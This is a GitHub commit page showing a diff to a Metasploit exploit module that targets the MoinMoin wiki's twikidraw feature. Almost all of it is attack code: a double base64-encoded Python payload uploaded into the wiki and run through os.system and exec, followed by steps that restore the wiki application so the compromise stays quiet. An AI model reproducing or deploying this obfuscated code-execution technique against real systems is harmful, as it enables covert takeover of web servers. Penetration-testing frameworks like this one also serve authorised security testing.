Skip to content

Commit a894dc8

Browse files
author
jvazquez-r7
committed
Try restore also at exploiting time
1 parent 90cad4b commit a894dc8

File tree

1 file changed

+5
-2
lines changed

1 file changed

+5
-2
lines changed

modules/exploits/unix/webapp/moinmoin_twikidraw.rb

Lines changed: 5 additions & 2 deletions
Original file line numberDiff line numberDiff line change
@@ -217,7 +217,6 @@ def writable_page?(session)
217217
return true
218218
end
219219

220-
221220
def exploit
222221

223222
# Init variables
@@ -250,7 +249,11 @@ def exploit
250249

251250
# Upload payload
252251
print_status("Trying to upload payload...")
253-
python_cmd = "import os\nos.system(\"#{Rex::Text.encode_base64(payload.encoded)}\".decode(\"base64\"))"
252+
python_cmd = "import sys, os\n"
253+
python_cmd << "os.system(\"#{Rex::Text.encode_base64(payload.encoded)}\".decode(\"base64\"))\n"
254+
python_cmd << "sys.path.insert(0, '/usr/local/share/moin')\n"
255+
python_cmd << "from MoinMoin.web.serving import make_application\n"
256+
python_cmd << "application = make_application(shared=True)"
254257
res = upload_code(session, "exec('#{Rex::Text.encode_base64(python_cmd)}'.decode('base64'))")
255258
if not res
256259
fail_with(Exploit::Failure::Unknown, "Error uploading the payload")

0 commit comments

Comments
 (0)